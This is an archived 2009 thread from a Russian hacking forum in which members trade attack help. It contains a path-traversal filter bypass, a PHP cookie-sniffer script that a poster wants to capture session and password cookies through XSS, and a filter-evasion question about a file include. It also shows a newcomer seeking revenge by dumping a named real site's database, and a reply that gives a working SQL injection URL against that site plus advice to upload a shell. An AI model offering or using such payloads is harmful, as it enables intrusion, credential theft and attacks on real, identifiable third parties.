ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.04.2009, 19:34
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Пробовал на 2 хостах, не пашут оба варианта.
|
|
|
01.04.2009, 20:03
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
на винде:
lol=./.\file
Схема такая это ./.\ пройдёт первую проверку без изменений, а после второй срежется "/".
В итоге получим ..\
Если нужно ещё выше, думаю всё понятно ./.\./.\./.\ и т.д.
Тоесть "." впихнуть можно, а вот "/" будут резаться
|
|
|
|
01.04.2009, 20:07
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
К теме о Xss
Есть 3 имени cookie.
PHPSESSID, .sait.ru_c_user, .sait.ru_c_password
Как заставить скрипт записывать эти 3 параметра?:
<?
$data_filename = "data.txt";
$max_entries =0; // 0 для снятия лимита
require 'functions.php';
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes(urldecode($_SERVER['HTTP_REFERER'])));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
//$sniffed['query'] = ($_SERVER['QUERY_STRING']);
$sniffed['agent'] = htmlspecialchars(stripslashes($_SERVER['HTTP_USER_AGENT']));
$sniffed['real_ip'] = htmlspecialchars(stripslashes($_SERVER['HTTP_X_FORWARDED_FOR']));
$entrie = serialize($sniffed);
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
echo "<script>window.location.href='Location:http://www.sait.ru/;</script>";
?>
Супер переменная
$sniffed['query'] = ($_SERVER['QUERY_STRING']);
Записывает данные из PHPSESSID, как указать на то, чтобы она записывала данные из
.sait.ru_c_user, .sait.ru_c_password?
CMS платная, социалка ablespace |
|
|
|
01.04.2009, 20:28
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Похожий вопрос ... можно ли как нибудь обойти =>
<?
$file = $_REQUEST["file"];
$file = ereg_replace("[\\/]+", "/", $file);
$file = ereg_replace("\.+[\\/]", "", $file);
print $file."<br>";
if (strpos($file, "/long/")!==false)
{
echo "$file";
if (strpos($file, "/long_word/long/")===0 ||
strpos($file, "/very_long_word/")===0) include($_SERVER["DOCUMENT_ROOT"]."/".$file);
print $file;
}
?>
|
|
|
|
02.04.2009, 14:18
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
Сорри, если не туда запостил.
Может есть у кого словарь с именами таблиц/полей.
Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
|
|
|
|
02.04.2009, 14:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от hackmen
Сорри, если не туда запостил.
Может есть у кого словарь с именами таблиц/полей.
Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
https://forum.antichat.ru/thread93547.html
пользуемся поиском.
линк продублировал в пм.
|
|
|
|
02.04.2009, 15:44
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669
Репутация:
10
|
|
Доброго дня всем 
Подскажите как взломать сайт и слить его базу ?
У меня есть все файлы от сайта
Есть название и пароль от базы данных
Скрипт новости выдает ошибку при запросе: http://www.rikor-electronics.ru/news.php?id=50'
вот сама ошибка: .mysql_error().
Еслиб был доступ к фтп то можно было бы залить шел, но у меня его нет 
Как вот с этими данными слить базу ? помогите... создатель этого сайта предал просто меня ( а дружили с детства |
|
|
|
02.04.2009, 15:51
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
http://www.rikor-electronics.ru/news.php?id=-50+union+select+version(),2,3,4--
>>Есть название и пароль от базы данных
Лей шелл и дампи бд)
|
|
|
|
02.04.2009, 15:52
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669
Репутация:
10
|
|
а как я не очень понимаю в этом?
помогите пожалуйста я Вам подарю еще один сайт с паролями!
Последний раз редактировалось joomler; 02.04.2009 в 15:55..
|
|
|
|
02.04.2009, 16:02
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
там установлен phpmyadmin?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид